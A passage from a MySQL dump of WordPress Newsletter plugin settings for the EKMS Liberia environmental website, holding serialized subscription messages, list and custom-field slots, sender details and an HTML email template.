cannot subscribe with the email address you entered, please contact the site administrator.</p>\";s:17:\"subscription_text\";s:26:\"<p>{subscription_form}</p>\";s:17:\"confirmation_text\";s:104:\"<p>A confirmation email is on the way. Follow the instructions and check the spam folder. Thank you.</p>\";s:20:\"confirmation_subject\";s:32:\"Please confirm your subscription\";s:21:\"confirmation_tracking\";s:0:\"\";s:20:\"confirmation_message\";s:94:\"<p>Please confirm your subscription <a href=\"{subscription_confirm_url}\">clicking here</a></p>\";s:14:\"confirmed_text\";s:43:\"<p>Your subscription has been confirmed</p>\";s:17:\"confirmed_subject\";s:7:\"Welcome\";s:17:\"confirmed_message\";s:140:\"<p>This message confirms your subscription to our newsletter. Thank you!</p>\r\n<hr />\r\n<p><a href=\"{profile_url}\">Change your profile</a></p>\";s:18:\"confirmed_tracking\";s:0:\"\";s:14:\"optin_override\";s:1:\"0\";s:16:\"confirmation_url\";s:0:\"\";s:13:\"confirmed_url\";s:0:\"\";s:18:\"confirmed_disabled\";s:1:\"0\";}','yes'),(3206572,'newsletter_info','a:18:{s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";}','no'),(3206573,'newsletter_lists','a:120:{s:6:\"list_1\";s:0:\"\";s:13:\"list_1_status\";i:0;s:13:\"list_1_forced\";i:0;s:6:\"list_2\";s:0:\"\";s:13:\"list_2_status\";i:0;s:13:\"list_2_forced\";i:0;s:6:\"list_3\";s:0:\"\";s:13:\"list_3_status\";i:0;s:13:\"list_3_forced\";i:0;s:6:\"list_4\";s:0:\"\";s:13:\"list_4_status\";i:0;s:13:\"list_4_forced\";i:0;s:6:\"list_5\";s:0:\"\";s:13:\"list_5_status\";i:0;s:13:\"list_5_forced\";i:0;s:6:\"list_6\";s:0:\"\";s:13:\"list_6_status\";i:0;s:13:\"list_6_forced\";i:0;s:6:\"list_7\";s:0:\"\";s:13:\"list_7_status\";i:0;s:13:\"list_7_forced\";i:0;s:6:\"list_8\";s:0:\"\";s:13:\"list_8_status\";i:0;s:13:\"list_8_forced\";i:0;s:6:\"list_9\";s:0:\"\";s:13:\"list_9_status\";i:0;s:13:\"list_9_forced\";i:0;s:7:\"list_10\";s:0:\"\";s:14:\"list_10_status\";i:0;s:14:\"list_10_forced\";i:0;s:7:\"list_11\";s:0:\"\";s:14:\"list_11_status\";i:0;s:14:\"list_11_forced\";i:0;s:7:\"list_12\";s:0:\"\";s:14:\"list_12_status\";i:0;s:14:\"list_12_forced\";i:0;s:7:\"list_13\";s:0:\"\";s:14:\"list_13_status\";i:0;s:14:\"list_13_forced\";i:0;s:7:\"list_14\";s:0:\"\";s:14:\"list_14_status\";i:0;s:14:\"list_14_forced\";i:0;s:7:\"list_15\";s:0:\"\";s:14:\"list_15_status\";i:0;s:14:\"list_15_forced\";i:0;s:7:\"list_16\";s:0:\"\";s:14:\"list_16_status\";i:0;s:14:\"list_16_forced\";i:0;s:7:\"list_17\";s:0:\"\";s:14:\"list_17_status\";i:0;s:14:\"list_17_forced\";i:0;s:7:\"list_18\";s:0:\"\";s:14:\"list_18_status\";i:0;s:14:\"list_18_forced\";i:0;s:7:\"list_19\";s:0:\"\";s:14:\"list_19_status\";i:0;s:14:\"list_19_forced\";i:0;s:7:\"list_20\";s:0:\"\";s:14:\"list_20_status\";i:0;s:14:\"list_20_forced\";i:0;s:7:\"list_21\";s:0:\"\";s:14:\"list_21_status\";i:0;s:14:\"list_21_forced\";i:0;s:7:\"list_22\";s:0:\"\";s:14:\"list_22_status\";i:0;s:14:\"list_22_forced\";i:0;s:7:\"list_23\";s:0:\"\";s:14:\"list_23_status\";i:0;s:14:\"list_23_forced\";i:0;s:7:\"list_24\";s:0:\"\";s:14:\"list_24_status\";i:0;s:14:\"list_24_forced\";i:0;s:7:\"list_25\";s:0:\"\";s:14:\"list_25_status\";i:0;s:14:\"list_25_forced\";i:0;s:7:\"list_26\";s:0:\"\";s:14:\"list_26_status\";i:0;s:14:\"list_26_forced\";i:0;s:7:\"list_27\";s:0:\"\";s:14:\"list_27_status\";i:0;s:14:\"list_27_forced\";i:0;s:7:\"list_28\";s:0:\"\";s:14:\"list_28_status\";i:0;s:14:\"list_28_forced\";i:0;s:7:\"list_29\";s:0:\"\";s:14:\"list_29_status\";i:0;s:14:\"list_29_forced\";i:0;s:7:\"list_30\";s:0:\"\";s:14:\"list_30_status\";i:0;s:14:\"list_30_forced\";i:0;s:7:\"list_31\";s:0:\"\";s:14:\"list_31_status\";i:0;s:14:\"list_31_forced\";i:0;s:7:\"list_32\";s:0:\"\";s:14:\"list_32_status\";i:0;s:14:\"list_32_forced\";i:0;s:7:\"list_33\";s:0:\"\";s:14:\"list_33_status\";i:0;s:14:\"list_33_forced\";i:0;s:7:\"list_34\";s:0:\"\";s:14:\"list_34_status\";i:0;s:14:\"list_34_forced\";i:0;s:7:\"list_35\";s:0:\"\";s:14:\"list_35_status\";i:0;s:14:\"list_35_forced\";i:0;s:7:\"list_36\";s:0:\"\";s:14:\"list_36_status\";i:0;s:14:\"list_36_forced\";i:0;s:7:\"list_37\";s:0:\"\";s:14:\"list_37_status\";i:0;s:14:\"list_37_forced\";i:0;s:7:\"list_38\";s:0:\"\";s:14:\"list_38_status\";i:0;s:14:\"list_38_forced\";i:0;s:7:\"list_39\";s:0:\"\";s:14:\"list_39_status\";i:0;s:14:\"list_39_forced\";i:0;s:7:\"list_40\";s:0:\"\";s:14:\"list_40_status\";i:0;s:14:\"list_40_forced\";i:0;}','yes'),(3206574,'newsletter_template','a:1:{s:8:\"template\";s:2365:\"<!DOCTYPE html>\n<html>\n    <head>\n        <!-- General styles, not used by all email clients -->\n        <style type=\"text/css\" media=\"all\">\n            a {\n                text-decoration: none;\n                color: #0088cc;\n            }\n            hr {\n                border-top: 1px solid #999;\n            }\n        </style>\n    </head>\n\n    <!-- KEEP THE LAYOUT SIMPLE: THOSE ARE SERVICE MESSAGES. -->\n    <body style=\"margin: 0; padding: 0;\">\n\n        <!-- Top title with dark background -->\n        <table style=\"background-color: #444; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\n            <tr>\n                <td style=\"padding: 20px; text-align: center; font-family: sans-serif; color: #fff; font-size: 28px\">\n                    {blog_title}\n                </td>\n            </tr>\n        </table>\n\n        <!-- Main table 100% wide with background color #eee -->    \n        <table style=\"background-color: #eee; width: 100%;\">\n            <tr>\n                <td align=\"center\" style=\"padding: 15px;\">\n\n                    <!-- Content table with backgdound color #fff, width 500px -->\n                    <table style=\"background-color: #fff; max-width: 600px; width: 100%; border: 1px solid #ddd;\">\n                        <tr>\n                            <td style=\"padding: 15px; color: #333; font-size: 16px; font-family: sans-serif\">\n                                <!-- The \"message\" tag below is replaced with one of confirmation, welcome or goodbye messages -->\n                                <!-- Messages content can be configured on Newsletter List Building panels --> \n\n                                {message}\n\n                                <hr>\n                                <!-- Signature if not already added to single messages (surround with <p>) -->\n                                <p>\n                                    <small>\n                                        <a href=\"{blog_url}\">{blog_url}</a><br>\n                                        {company_name}<br>\n                                        {company_address}\n                                    </small>\n                                </p>\n                                \n\n                            </td>\n                        </tr>\n                    </table>\n\n                </td>\n            </tr>\n        </table>\n\n    </body>\n</html>\";}','yes'),(3206576,'newsletter_version','8.0.9','yes'),(3252993,'newsletter_backup_7.8.5','a:22:{s:19:\"newsletter_antispam\";a:6:{s:12:\"ip_blacklist\";a:0:{}s:17:\"address_blacklist\";a:0:{}s:9:\"antiflood\";s:2:\"30\";s:7:\"akismet\";s:1:\"0\";s:7:\"captcha\";s:1:\"1\";s:8:\"disabled\";s:1:\"0\";}s:23:\"newsletter_customfields\";a:121:{s:16:\"profile_1_status\";s:1:\"0\";s:9:\"profile_1\";s:0:\"\";s:14:\"profile_1_type\";s:4:\"text\";s:21:\"profile_1_placeholder\";s:0:\"\";s:15:\"profile_1_rules\";s:1:\"0\";s:17:\"profile_1_options\";s:0:\"\";s:16:\"profile_2_status\";s:1:\"0\";s:9:\"profile_2\";s:0:\"\";s:14:\"profile_2_type\";s:4:\"text\";s:21:\"profile_2_placeholder\";s:0:\"\";s:15:\"profile_2_rules\";s:1:\"0\";s:17:\"profile_2_options\";s:0:\"\";s:16:\"profile_3_status\";s:1:\"0\";s:9:\"profile_3\";s:0:\"\";s:14:\"profile_3_type\";s:4:\"text\";s:21:\"profile_3_placeholder\";s:0:\"\";s:15:\"profile_3_rules\";s:1:\"0\";s:17:\"profile_3_options\";s:0:\"\";s:16:\"profile_4_status\";s:1:\"0\";s:9:\"profile_4\";s:0:\"\";s:14:\"profile_4_type\";s:4:\"text\";s:21:\"profile_4_placeholder\";s:0:\"\";s:15:\"profile_4_rules\";s:1:\"0\";s:17:\"profile_4_options\";s:0:\"\";s:16:\"profile_5_status\";s:1:\"0\";s:9:\"profile_5\";s:0:\"\";s:14:\"profile_5_type\";s:4:\"text\";s:21:\"profile_5_placeholder\";s:0:\"\";s:15:\"profile_5_rules\";s:1:\"0\";s:17:\"profile_5_options\";s:0:\"\";s:16:\"profile_6_status\";s:1:\"0\";s:9:\"profile_6\";s:0:\"\";s:14:\"profile_6_type\";s:4:\"text\";s:21:\"profile_6_placeholder\";s:0:\"\";s:15:\"profile_6_rules\";s:1:\"0\";s:17:\"profile_6_options\";s:0:\"\";s:16:\"profile_7_status\";s:1:\"0\";s:9:\"profile_7\";s:0:\"\";s:14:\"profile_7_type\";s:4:\"text\";s:21:\"profile_7_placeholder\";s:0:\"\";s:15:\"profile_7_rules\";s:1:\"0\";s:17:\"profile_7_options\";s:0:\"\";s:16:\"profile_8_status\";s:1:\"0\";s:9:\"profile_8\";s:0:\"\";s:14:\"profile_8_type\";s:4:\"text\";s:21:\"profile_8_placeholder\";s:0:\"\";s:15:\"profile_8_rules\";s:1:\"0\";s:17:\"profile_8_options\";s:0:\"\";s:16:\"profile_9_status\";s:1:\"0\";s:9:\"profile_9\";s:0:\"\";s:14:\"profile_9_type\";s:4:\"text\";s:21:\"profile_9_placeholder\";s:0:\"\";s:15:\"profile_9_rules\";s:1:\"0\";s:17:\"profile_9_options\";s:0:\"\";s:17:\"profile_10_status\";s:1:\"0\";s:10:\"profile_10\";s:0:\"\";s:15:\"profile_10_type\";s:4:\"text\";s:22:\"profile_10_placeholder\";s:0:\"\";s:16:\"profile_10_rules\";s:1:\"0\";s:18:\"profile_10_options\";s:0:\"\";s:17:\"profile_11_status\";s:1:\"0\";s:10:\"profile_11\";s:0:\"\";s:15:\"profile_11_type\";s:4:\"text\";s:22:\"profile_11_placeholder\";s:0:\"\";s:16:\"profile_11_rules\";s:1:\"0\";s:18:\"profile_11_options\";s:0:\"\";s:17:\"profile_12_status\";s:1:\"0\";s:10:\"profile_12\";s:0:\"\";s:15:\"profile_12_type\";s:4:\"text\";s:22:\"profile_12_placeholder\";s:0:\"\";s:16:\"profile_12_rules\";s:1:\"0\";s:18:\"profile_12_options\";s:0:\"\";s:17:\"profile_13_status\";s:1:\"0\";s:10:\"profile_13\";s:0:\"\";s:15:\"profile_13_type\";s:4:\"text\";s:22:\"profile_13_placeholder\";s:0:\"\";s:16:\"profile_13_rules\";s:1:\"0\";s:18:\"profile_13_options\";s:0:\"\";s:17:\"profile_14_status\";s:1:\"0\";s:10:\"profile_14\";s:0:\"\";s:15:\"profile_14_type\";s:4:\"text\";s:22:\"profile_14_placeholder\";s:0:\"\";s:16:\"profile_14_rules\";s:1:\"0\";s:18:\"profile_14_options\";s:0:\"\";s:17:\"profile_15_status\";s:1:\"0\";s:10:\"profile_15\";s:0:\"\";s:15:\"profile_15_type\";s:4:\"text\";s:22:\"profile_15_placeholder\";s:0:\"\";s:16:\"profile_15_rules\";s:1:\"0\";s:18:\"profile_15_options\";s:0:\"\";s:17:\"profile_16_status\";s:1:\"0\";s:10:\"profile_16\";s:0:\"\";s:15:\"profile_16_type\";s:4:\"text\";s:22:\"profile_16_placeholder\";s:0:\"\";s:16:\"profile_16_rules\";s:1:\"0\";s:18:\"profile_16_options\";s:0:\"\";s:17:\"profile_17_status\";s:1:\"0\";s:10:\"profile_17\";s:0:\"\";s:15:\"profile_17_type\";s:4:\"text\";s:22:\"profile_17_placeholder\";s:0:\"\";s:16:\"profile_17_rules\";s:1:\"0\";s:18:\"profile_17_options\";s:0:\"\";s:17:\"profile_18_status\";s:1:\"0\";s:10:\"profile_18\";s:0:\"\";s:15:\"profile_18_type\";s:4:\"text\";s:22:\"profile_18_placeholder\";s:0:\"\";s:16:\"profile_18_rules\";s:1:\"0\";s:18:\"profile_18_options\";s:0:\"\";s:17:\"profile_19_status\";s:1:\"0\";s:10:\"profile_19\";s:0:\"\";s:15:\"profile_19_type\";s:4:\"text\";s:22:\"profile_19_placeholder\";s:0:\"\";s:16:\"profile_19_rules\";s:1:\"0\";s:18:\"profile_19_options\";s:0:\"\";s:17:\"profile_20_status\";s:1:\"0\";s:10:\"profile_20\";s:0:\"\";s:15:\"profile_20_type\";s:4:\"text\";s:22:\"profile_20_placeholder\";s:0:\"\";s:16:\"profile_20_rules\";s:1:\"0\";s:18:\"profile_20_options\";s:0:\"\";s:13:\"profile_error\";s:34:\"A mandatory field is not filled in\";}s:20:\"newsletter_dismissed\";a:1:{s:20:\"newsletter-shortcode\";i:1;}s:17:\"newsletter_emails\";a:1:{s:5:\"theme\";s:7:\"default\";}s:31:\"newsletter_emails_theme_default\";a:0:{}s:15:\"newsletter_form\";a:68:{s:5:\"email\";s:5:\"Email\";s:11:\"email_error\";s:28:\"Email address is not correct\";s:4:\"name\";s:23:\"First name or full name\";s:11:\"name_status\";i:2;s:10:\"name_rules\";s:1:\"0\";s:7:\"surname\";s:9:\"Last name\";s:14:\"surname_status\";s:1:\"0\";s:10:\"sex_status\";s:1:\"0\";s:3:\"sex\";s:3:\"I\'m\";s:7:\"privacy\";s:52:\"By continuing, you accept the cookies privacy policy\";s:14:\"privacy_status\";i:1;s:11:\"privacy_url\";s:48:\"https://ekmsliberia.info/cookies-privacy-policy/\";s:18:\"privacy_use_wp_url\";i:0;s:9:\"subscribe\";s:12:\"Get Updates!\";s:12:\"title_female\";s:3:\"Ms.\";s:10:\"title_male\";s:3:\"Mr.\";s:10:\"title_none\";s:4:\"Dear\";s:8:\"sex_male\";s:3:\"Man\";s:10:\"sex_female\";s:5:\"Woman\";s:8:\"sex_none\";s:13:\"Not specified\";s:10:\"name_error\";s:16:\"Name is required\";s:13:\"surname_rules\";s:1:\"0\";s:13:\"surname_error\";s:21:\"Last name is required\";s:9:\"sex_rules\";s:1:\"0\";s:13:\"privacy_error\";s:42:\"You must accept the cookies privacy policy\";s:13:\"list_1_forced\";i:0;s:13:\"list_2_forced\";i:0;s:13:\"list_3_forced\";i:0;s:13:\"list_4_forced\";i:0;s:13:\"list_5_forced\";i:0;s:13:\"list_6_forced\";i:0;s:13:\"list_7_forced\";i:0;s:13:\"list_8_forced\";i:0;s:13:\"list_9_forced\";i:0;s:14:\"list_10_forced\";i:0;s:14:\"list_11_forced\";i:0;s:14:\"list_12_forced\";i:0;s:14:\"list_13_forced\";i:0;s:14:\"list_14_forced\";i:0;s:14:\"list_15_forced\";i:0;s:14:\"list_16_forced\";i:0;s:14:\"list_17_forced\";i:0;s:14:\"list_18_forced\";i:0;s:14:\"list_19_forced\";i:0;s:14:\"list_20_forced\";i:0;s:14:\"list_21_forced\";i:0;s:14:\"list_22_forced\";i:0;s:14:\"list_23_forced\";i:0;s:14:\"list_24_forced\";i:0;s:14:\"list_25_forced\";i:0;s:14:\"list_26_forced\";i:0;s:14:\"list_27_forced\";i:0;s:14:\"list_28_forced\";i:0;s:14:\"list_29_forced\";i:0;s:14:\"list_30_forced\";i:0;s:14:\"list_31_forced\";i:0;s:14:\"list_32_forced\";i:0;s:14:\"list_33_forced\";i:0;s:14:\"list_34_forced\";i:0;s:14:\"list_35_forced\";i:0;s:14:\"list_36_forced\";i:0;s:14:\"list_37_forced\";i:0;s:14:\"list_38_forced\";i:0;s:14:\"list_39_forced\";i:0;s:14:\"list_40_forced\";i:0;s:12:\"customfields\";a:0:{}s:5:\"lists\";a:0:{}s:13:\"lists_checked\";a:0:{}}s:15:\"newsletter_info\";a:18:{s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";}s:23:\"newsletter_install_time\";s:10:\"1575385711\";s:16:\"newsletter_lists\";a:120:{s:6:\"list_1\";s:0:\"\";s:13:\"list_1_status\";i:0;s:13:\"list_1_forced\";i:0;s:6:\"list_2\";s:0:\"\";s:13:\"list_2_status\";i:0;s:13:\"list_2_forced\";i:0;s:6:\"list_3\";s:0:\"\";s:13:\"list_3_status\";i:0;s:13:\"list_3_forced\";i:0;s:6:\"list_4\";s:0:\"\";s:13:\"list_4_status\";i:0;s:13:\"list_4_forced\";i:0;s:6:\"list_5\";s:0:\"\";s:13:\"list_5_status\";i:0;s:13:\"list_5_forced\";i:0;s:6:\"list_6\";s:0:\"\";s:13:\"list_6_status\";i:0;s:13:\"list_6_forced\";i:0;s:6:\"list_7\";s:0:\"\";s:13:\"list_7_status\";i:0;s:13:\"list_7_forced\";i:0;s:6:\"list_8\";s:0:\"\";s:13:\"list_8_status\";i:0;s:13:\"list_8_forced\";i:0;s:6:\"list_9\";s:0:\"\";s:13:\"list_9_status\";i:0;s:13:\"list_9_forced\";i:0;s:7:\"list_10\";s:0:\"\";s:14:\"list_10_status\";i:0;s:14:\"list_10_forced\";i:0;s:7:\"list_11\";s:0:\"\";s:14:\"list_11_status\";i:0;s:14:\"list_11_forced\";i:0;s:7:\"list_12\";s:0:\"\";s:14:\"list_12_status\";i:0;s:14:\"list_12_forced\";i:0;s:7:\"list_13\";s:0:\"\";s:14:\"list_13_status\";i:0;s:14:\"list_13_forced\";i:0;s:7:\"list_14\";s:0:\"\";s:14:\"list_14_status\";i:0;s:14:\"list_14_forced\";i:0;s:7:\"list_15\";s:0:\"\";s:14:\"list_15_status\";i:0;s:14:\"list_15_forced\";i:0;s:7:\"list_16\";s:0:\"\";s:14:\"list_16_status\";i:0;s:14:\"list_16_forced\";i:0;s:7:\"list_17\";s:0:\"\";s:14:\"list_17_status\";i:0;s:14:\"list_17_forced\";i:0;s:7:\"list_18\";s:0:\"\";s:14:\"list_18_status\";i:0;s:14:\"list_18_forced\";i:0;s:7:\"list_19\";s:0:\"\";s:14:\"list_19_status\";i:0;s:14:\"list_19_forced\";i:0;s:7:\"list_20\";s:0:\"\";s:14:\"list_20_status\";i:0;s:14:\"list_20_forced\";i:0;s:7:\"list_21\";s:0:\"\";s:14:\"list_21_status\";i:0;s:14:\"list_21_forced\";i:0;s:7:\"list_22\";s:0:\"\";s:14:\"list_22_status\";i:0;s:14:\"list_22_forced\";i:0;s:7:\"list_23\";s:0:\"\";s:14:\"list_23_status\";i:0;s:14:\"list_23_forced\";i:0;s:7:\"list_24\";s:0:\"\";s:14:\"list_24_status\";i:0;s:14:\"list_24_forced\";i:0;s:7:\"list_25\";s:0:\"\";s:14:\"list_25_status\";i:0;s:14:\"list_25_forced\";i:0;s:7:\"list_26\";s:0:\"\";s:14:\"list_26_status\";i:0;s:14:\"list_26_forced\";i:0;s:7:\"list_27\";s:0:\"\";s:14:\"list_27_status\";i:0;s:14:\"list_27_forced\";i:0;s:7:\"list_28\";s:0:\"\";s:14:\"list_28_status\";i:0;s:14:\"list_28_forced\";i:0;s:7:\"list_29\";s:0:\"\";s:14:\"list_29_status\";i:0;s:14:\"list_29_forced\";i:0;s:7:\"list_30\";s:0:\"\";s:14:\"list_30_status\";i:0;s:14:\"list_30_forced\";i:0;s:7:\"list_31\";s:0:\"\";s:14:\"list_31_status\";i:0;s:14:\"list_31_forced\";i:0;s:7:\"list_32\";s:0:\"\";s:14:\"list_32_status\";i:0;s:14:\"list_32_forced\";i:0;s:7:\"list_33\";s:0:\"\";s:14:\"list_33_status\";i:0;s:14:\"list_33_forced\";i:0;s:7:\"list_34\";s:0:\"\";s:14:\"list_34_status\";i:0;s:14:\"list_34_forced\";i:0;s:7:\"list_35\";s:0:\"\";s:14:\"list_35_status\";i:0;s:14:\"list_35_forced\";i:0;s:7:\"list_36\";s:0:\"\";s:14:\"list_36_status\";i:0;s:14:\"list_36_forced\";i:0;s:7:\"list_37\";s:0:\"\";s:14:\"list_37_status\";i:0;s:14:\"list_37_forced\";i:0;s:7:\"list_38\";s:0:\"\";s:14:\"list_38_status\";i:0;s:14:\"list_38_forced\";i:0;s:7:\"list_39\";s:0:\"\";s:14:\"list_39_status\";i:0;s:14:\"list_39_forced\";i:0;s:7:\"list_40\";s:0:\"\";s:14:\"list_40_status\";i:0;s:14:\"list_40_forced\";i:0;}s:20:\"newsletter_log_level\";s:1:\"0\";s:24:\"newsletter_logger_secret\";s:8:\"dc01b950\";s:15:\"newsletter_main\";a:37:{s:11:\"return_path\";b:0;s:8:\"reply_to\";b:0;s:12:\"sender_email\";s:24:\"contact@ekmsliberia.info\";s:11:\"sender_name\";s:23:\"Liberia EKMS Newsletter\";s:6:\"editor\";i:0;s:13:\"scheduler_max\";s:5:\"10000\";s:9:\"phpmailer\";i:0;s:5:\"debug\";s:1:\"0\";s:5:\"track\";s:1:\"1\";s:3:\"css\";s:0:\"\";s:12:\"css_disabled\";s:1:\"0\";s:2:\"ip\";s:0:\"\";s:4:\"page\";s:4:\"2904\";s:19:\"disable_cron_notice\";i:0;s:13:\"do_shortcodes\";s:1:\"0\";s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";s:12:\"contract_key\";s:0:\"\";s:9:\"log_level\";s:1:\"0\";s:25:\"content_transfer_encoding\";s:0:\"\";s:5:\"roles\";a:0:{}}s:15:\"newsletter_page\";s:4:\"2904\";s:18:\"newsletter_profile\";a:10:{s:4:\"text\";s:188:\"{profile_form}\n    <p>If you change your email address, a confirmation email will be sent to activate it.</p>\n    <p><a href=\"{unsubscription_confirm_url}\">Cancel your subscription</a></p>\";s:13:\"email_changed\";s:81:\"Your email has been changed, an activation email has been sent with instructions.\";s:5:\"error\";s:42:\"Your email is not valid or already in use.\";s:10:\"save_label\";s:4:\"Save\";s:13:\"privacy_label\";s:21:\"Read our privacy note\";s:5:\"saved\";s:14:\"Profile saved.\";s:18:\"export_newsletters\";i:0;s:3:\"url\";s:0:\"\";s:5:\"lists\";a:0:{}s:12:\"customfields\";a:0:{}}s:21:\"newsletter_statistics\";a:1:{s:3:\"key\";s:32:\"3e00f6b7ad514de0ee66dbc9f56651eb\";}s:23:\"newsletter_subscription\";a:18:{s:14:\"noconfirmation\";s:1:\"1\";s:12:\"notify_email\";s:24:\"contact@ekmsliberia.info\";s:8:\"multiple\";s:1:\"0\";s:6:\"notify\";s:1:\"0\";s:10:\"error_text\";s:102:\"<p>You cannot subscribe with the email address you entered, please contact the site administrator.</p>\";s:17:\"subscription_text\";s:26:\"<p>{subscription_form}</p>\";s:17:\"confirmation_text\";s:104:\"<p>A confirmation email is on the way. Follow the instructions and check the spam folder. Thank you.</p>\";s:20:\"confirmation_subject\";s:32:\"Please confirm your subscription\";s:21:\"confirmation_tracking\";s:0:\"\";s:20:\"confirmation_message\";s:94:\"<p>Please confirm your subscription <a href=\"{subscription_confirm_url}\">clicking here</a></p>\";s:14:\"confirmed_text\";s:43:\"<p>Your subscription has been confirmed</p>\";s:17:\"confirmed_subject\";s:7:\"Welcome\";s:17:\"confirmed_message\";s:140:\"<p>This message confirms your subscription to our newsletter. Thank you!</p>\r\n<hr />\r\n<p><a href=\"{profile_url}\">Change your profile</a></p>\";s:18:\"confirmed_tracking\";s:0:\"\";s:14:\"optin_override\";s:1:\"0\";s:16:\"confirmation_url\";s:0:\"\";s:13:\"confirmed_url\";s:0:\"\";s:18:\"confirmed_disabled\";s:1:\"0\";}s:17:\"newsletter_system\";a:0:{}s:19:\"newsletter_template\";a:1:{s:8:\"template\";s:2365:\"<!DOCTYPE html>\n<html>\n    <head>\n        <!-- General styles, not used by all email clients -->\n        <style type=\"text/css\" media=\"all\">\n            a {\n                text-decoration: none;\n                color: #0088cc;\n            }\n            hr {\n                border-top: 1px solid #999;\n            }\n        </style>\n    </head>\n\n    <!-- KEEP THE LAYOUT SIMPLE: THOSE ARE SERVICE MESSAGES. -->\n    <body style=\"margin: 0; padding: 0;\">\n\n        <!-- Top title with dark background -->\n        <table style=\"background-color: #444; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\n            <tr>\n                <td style=\"padding: 20px; text-align: center; font-family: sans-serif; color: #fff; font-size: 28px\">\n                    {blog_title}\n                </td>\n            </tr>\n        </table>\n\n        <!-- Main table 100% wide with background color #eee -->    \n        <table style=\"background-color: #eee; width: 100%;\">\n            <tr>\n                <td align=\"center\" style=\"padding: 15px;\">\n\n                    <!-- Content table with backgdound color #fff, width 500px -->\n                    <table style=\"background-color: #fff; max-width: 600px; width: 100%; border: 1px solid #ddd;\">\n                        <tr>\n                            <td style=\"padding: 15px; color: #333; font-size: 16px; font-family: sans-serif\">\n                                <!-- The \"message\" tag below is replaced with one of confirmation, welcome or goodbye messages -->\n                                <!-- Messages content can be configured on Newsletter List Building panels --> \n\n                                {message}\n\n                                <hr>\n                                <!-- Signature if not already added to single messages (surround with <p>) -->\n                                <p>\n                                    <small>\n                                        <a href=\"{blog_url}\">{blog_url}</a><br>\n                                        {company_name}<br>\n                                        {company_address}\n                                    </small>\n                                </p>\n                                \n\n                            </td>\n                        </tr>\n                    </table>\n\n                </td>\n            </tr>\n        </table>\n\n    </body>\n</html>\";}s:25:\"newsletter_unsubscription\";a:8:{s:16:\"unsubscribe_text\";s:103:\"<p>Please confirm you want to unsubscribe <a href=\"{unsubscription_confirm_url}\">clicking here</a>.</p>\";s:10:\"error_text\";s:99:\"<p>Subscriber not found, it probably has already been removed. No further actions are required.</p>\";s:17:\"unsubscribed_text\";s:124:\"<p>Your subscription has been deleted. If that was an error you can <a href=\"{reactivate_url}\">subscribe again here</a>.</p>\";s:20:\"unsubscribed_subject\";s:7:\"Goodbye\";s:20:\"unsubscribed_message\";s:87:\"<p>This message confirms that you have unsubscribed from our newsletter. Thank you.</p>\";s:16:\"reactivated_text\";s:46:\"<p>Your subscription has been 